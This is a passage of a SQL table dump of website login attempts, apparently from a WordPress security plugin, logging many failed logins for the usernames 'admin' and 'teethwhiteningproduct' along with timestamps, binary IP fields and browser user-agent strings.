Firefox/62.0'),(5141,6849,1629263562.828400,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5142,6850,1629263765.722767,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5143,6851,1629263967.638166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5144,6852,1629264168.017284,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5145,6853,1629264373.355656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5146,6854,1629264573.575994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5147,6855,1629264990.560782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����o�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5148,6856,1629265176.996863,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5149,6857,1629265405.622004,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5150,6858,1629265581.922746,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5151,6859,1629265785.470391,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5152,6860,1629265988.194806,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-u��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5153,6861,1629266191.900769,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5154,6862,1629266395.258335,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5155,6863,1629266622.103608,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5156,6864,1629266841.556325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5157,6865,1629267025.498550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�$b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5158,6866,1629267240.124669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5159,6867,1629267419.210793,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��؉�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5160,6868,1629267501.129256,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),(5161,6869,1629267649.673709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rQ(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5162,6870,1629267971.907981,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5163,6871,1629268173.710091,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ݵ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5164,6872,1629268374.059562,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�ʖ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5165,6873,1629268578.869327,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���EAm','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5166,6874,1629268795.956502,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~�O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5167,6875,1629268987.562394,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5168,6876,1629269221.718824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5169,6877,1629269433.554033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5170,6878,1629269604.417092,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5171,6879,1629269837.506010,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5172,6880,1629269992.610782,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5173,6881,1629270031.734863,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5174,6882,1629270241.117598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5175,6883,1629270419.222682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5176,6883,1629270419.259026,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5177,6884,1629270627.711223,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5178,6885,1629270859.345309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5179,6886,1629271064.063602,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5180,6887,1629271242.397067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5181,6888,1629271482.124882,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�;-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5182,6888,1629271482.178361,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�;-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5183,6889,1629271674.691241,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5184,6890,1629271881.766935,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5185,6891,1629272094.930158,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5186,6892,1629272296.783669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5187,6893,1629272506.454384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5188,6894,1629272718.288142,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����#X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5189,6895,1629272908.977791,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5190,6896,1629273108.266472,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5191,6897,1629273351.573435,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5192,6898,1629273550.533179,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5193,6899,1629273751.461451,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5194,6900,1629273948.219525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5195,6901,1629274179.430088,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5196,6902,1629274391.634301,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��� �A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5197,6903,1629274580.103844,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5198,6904,1629274796.139236,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˖0v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5199,6905,1629275017.395452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ca�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5200,6906,1629275225.909688,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5201,6907,1629275429.221844,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��u5�A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5202,6908,1629275645.400413,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5203,6909,1629275881.945511,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5204,6910,1629276092.343693,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5205,6911,1629276278.100074,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5206,6912,1629276527.167403,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5207,6913,1629276733.261293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5208,6914,1629276935.232994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ŜJ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5209,6915,1629277157.781541,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5210,6916,1629277364.472686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5211,6917,1629278270.837081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5212,6918,1629278654.772782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5213,6919,1629279023.544352,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5214,6920,1629279318.586205,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5215,6921,1629279725.012307,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5216,6922,1629280274.561861,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5217,6923,1629280274.997936,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5218,6924,1629280445.857243,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5219,6925,1629280591.343728,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5220,6926,1629280595.898416,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5221,6927,1629280737.092024,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5222,6928,1629280737.528050,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5223,6929,1629280830.922073,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�;-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5224,6930,1629281166.908849,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5225,6931,1629281167.416423,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5226,6932,1629281188.484259,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5227,6933,1629281380.522232,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5228,6934,1629281381.053496,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5229,6935,1629281567.961431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5230,6936,1629281938.075154,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/[+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5231,6937,1629282159.227814,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5232,6938,1629282159.831329,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5233,6939,1629282253.819626,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5234,6940,1629282254.268940,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5235,6941,1629282309.465296,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5236,6941,1629282309.512717,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5237,6942,1629282349.969022,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5238,6943,1629282350.455236,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5239,6944,1629282555.143415,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5240,6945,1629282555.944968,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5241,6946,1629282692.629906,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5242,6947,1629283019.502796,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5243,6949,1629283086.648479,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx�V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5244,6954,1629283425.042458,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���EAm','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5245,6954,1629283425.087307,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���EAm','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5246,6961,1629283806.721054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5247,6964,1629284120.200771,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5248,6969,1629284543.538238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5249,6974,1629284902.726683,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5250,6979,1629285301.501454,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5251,6984,1629285662.159063,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����؛','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5252,6987,1629286002.628041,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5253,6990,1629286352.107571,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5254,6995,1629286713.530784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#t;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5255,7002,1629287129.805213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5256,7007,1629287512.736797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5257,7007,1629287512.828525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5258,7012,1629287868.266611,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gzj�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5259,7021,1629289031.192601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���KG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5260,7026,1629289409.182898,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5261,7031,1629289769.592294,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5262,7038,1629290129.228561,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@wP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5263,7047,1629290821.126623,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5264,7050,1629290942.594527,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5265,7051,1629291242.358179,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5266,7056,1629291686.265229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5267,7057,1629292012.039195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5268,7064,1629292841.584297,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���kS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5269,7067,1629293228.158405,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5270,7074,1629293641.686450,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 